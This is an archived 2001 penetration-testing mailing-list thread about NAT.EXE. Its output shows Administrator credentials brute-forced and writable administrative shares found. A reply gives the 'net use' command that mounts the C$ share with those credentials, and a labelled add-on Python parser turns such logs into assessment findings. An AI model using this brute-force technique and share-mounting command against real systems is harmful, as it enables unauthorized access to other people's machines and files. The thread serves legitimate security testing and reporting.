RE: Using Null Session information from NAT.EXE
From: Herman Sheremetyev (Herman.Sheremetyev@hostcentric.com)
Date: 10/30/01
- Previous message: Ryan Permeh: "Re: xprobe 0.2"
- Maybe in reply to: Ian Lyte: "Using Null Session information from NAT.EXE"
- Next in thread: Oliver Karow: "Re: Using Null Session information from NAT.EXE"
Subject: RE: Using Null Session information from NAT.EXE
Date: Tue, 30 Oct 2001 15:05:44 -0500
Message-ID: <BE46985C58C4BE4A8CF9AA1C5C404C37284993@exvrtsrv.hostcentric.com>
From: "Herman Sheremetyev" <Herman.Sheremetyev@hostcentric.com>
To: "Ian Lyte" <ianlyte@hotmail.com>, <pen-test@securityfocus.com>
net use * \\IP_ADDR\C$ password /user:COMPUTER_NAME\username
should do the trick.
-Herman
-----Original Message-----
From: Ian Lyte [mailto:ianlyte@hotmail.com]
Sent: Tuesday, October 30, 2001 12:40 PM
To: pen-test@securityfocus.com
Subject: Using Null Session information from NAT.EXE
Running NAT.EXE on a machine on my local network gives me the following
results
[obvious bits changed]
[*]--- Reading usernames from user.txt
[*]--- Reading passwords from bigpass.txt
[*]--- Checking host: xxx.xxx.xxx.xxx
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Tue Oct 30 14:30:36 2001
[*]--- Timezone is UTC+0.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `0'
<---SNIP--->
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[xxxxxxx] User=[] Workgroup=[xxxxxxx] Domain=[]
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- WARNING: Able to access share: \\*SMBSERVER\D$
[*]--- Checking write access in: \\*SMBSERVER\D$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
Now from here I thought it would just be a case of
NET USE Z: xxx.xxx.xxx.xxx\c$ /user:administrator password
to map the C$ to a local z:
However every time I try that it gives me a
System error 1326 has occurred.
Logon Failure: unknown user name or bad password.
Now I have gone to the machine and know that the user:pass combo is
correct.
So, what am I doing wrong? I've searched the archives to no avail and I
notice on Google groups that a lot of people have asked the same question
but not received an answer. So I am turning to you guys ;)
Ian
------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
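Added example, not part of the original messages: a small parser that turns NAT.EXE output in the format quoted above into per-host findings for an assessment report, rejoining mail-wrapped lines and dropping <file://...> autolink residue. The sample log is constructed, and the function and field names are this example's own assumptions.

```python
import re

# Constructed sample in the NAT.EXE log format quoted above; the address is a
# documentation placeholder and the wrapped lines mimic the mail formatting.
SAMPLE = r"""[*]--- Checking host: 192.0.2.10
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
<file://\\*SMBSERVER\ADMIN$>
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
"""

HOST = re.compile(r"Checking host: (\S+)")
CRED = re.compile(r"CONNECTED: Username: `([^']*)' Password: `([^']*)'")
SHARE = re.compile(r"WARNING: (Able to access share|Directory is writeable): (\S+)")

def unwrap(text):
    """Rejoin mail-wrapped records and drop <file://...> autolink residue."""
    records = []
    for line in text.splitlines():
        line = re.sub(r"<file://[^>]*>", "", line).strip()
        if not line:
            continue
        if line.startswith("[*]---") or not records:
            records.append(line)
        else:
            records[-1] += " " + line  # continuation of the previous record
    return records

def parse_nat_log(text):
    """Group findings per host: null-session result, credentials, shares."""
    hosts, cur = {}, None
    for rec in unwrap(text):
        if m := HOST.search(rec):
            cur = hosts.setdefault(m.group(1), {"null_session_refused": False,
                  "credentials": [], "readable": [], "writable": []})
        elif cur is None:
            continue  # ignore anything before the first host header
        elif "Was not able to establish session with no password" in rec:
            cur["null_session_refused"] = True
        elif m := CRED.search(rec):
            cur["credentials"].append(m.groups())
        elif m := SHARE.search(rec):
            key = "readable" if m.group(1).startswith("Able") else "writable"
            cur[key].append(m.group(2))
    return hosts

if __name__ == "__main__":
    print(parse_nat_log(SAMPLE))
```

On a log like the one in the thread, the result separates the two findings a report should keep apart: the null session was refused, and access to the administrative shares came from a guessed Administrator password.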